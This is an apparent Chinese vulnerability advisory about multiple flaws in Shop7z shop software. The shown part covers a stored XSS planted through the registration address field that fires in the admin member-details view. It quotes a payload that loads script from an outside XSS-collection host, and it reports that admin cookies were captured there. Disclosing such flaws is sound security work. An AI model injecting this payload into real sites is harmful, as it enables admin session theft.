Shop7z多个漏洞大礼包

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 前台存储型XSS打后台,后台限制不严导致敏感数据访问,自己给自己充值TAT,等等···· ### 详细说明: 0x01 前台XSS,使用官方最新的免费版源代码 在注册用户的时候,地址当中输入XSS代码 "><script src=http://xsser.l1n3.net/WY6NN2?1407683427></script> 如图 [<img src="https://images.seebug.org/upload/201408/1023265040724c5236983bbd2bcc17a17a5a608d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/1023265040724c5236983bbd2bcc17a17a5a608d.png) 然后注册,显示注册成功 [<img src="https://images.seebug.org/upload/201408/1023272808d10e43ec30a3f8186f562669451834.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/1023272808d10e43ec30a3f8186f562669451834.png) 这时候查看一下后台---会员信息管理--会员管理---该会员详细信息 [<img src="https://images.seebug.org/upload/201408/10234150250f3010733e106134db42b6de070999.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/10234150250f3010733e106134db42b6de070999.png) 可以看到xss代码已经插进去了 而xss平台也能收到cookies信息...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息